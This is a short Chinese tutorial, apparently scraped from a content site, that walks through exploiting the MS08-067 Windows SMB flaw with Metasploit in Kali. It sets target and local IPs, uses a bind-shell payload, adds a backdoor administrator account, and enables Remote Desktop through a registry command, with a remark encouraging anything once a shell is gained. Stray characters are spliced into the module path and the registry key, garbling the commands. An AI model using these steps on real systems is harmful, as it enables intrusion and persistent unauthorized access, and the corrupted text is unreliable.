kalilinux攻击漏洞MS08_067

时间:2024-10-14 06:36:12

1、在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)

kalilinux攻击漏洞MS08_067

2、然后运行命令:use exploit/windows/smb/ms08_067娄多骋能_netapi #使用MS08067漏洞攻击程序

3、set LHOST 192.168.116.3 #设置本地主机IP

4、set RHOST 192.168.116.116 #设置目标主机IP

5、set payload windows/shell_bind_tcp #设置payload

6、show options#查看设置信息

7、exploit#实施攻击

8、攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。

kalilinux攻击漏洞MS08_067

9、添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

kalilinux攻击漏洞MS08_067

10、发现敛财醣沁并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Ter罪焐芡拂minal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

kalilinux攻击漏洞MS08_067

11、有了目标主机的cmdshell你想做什么不行吧?

12、好了演示到此完毕!

© 手抄报圈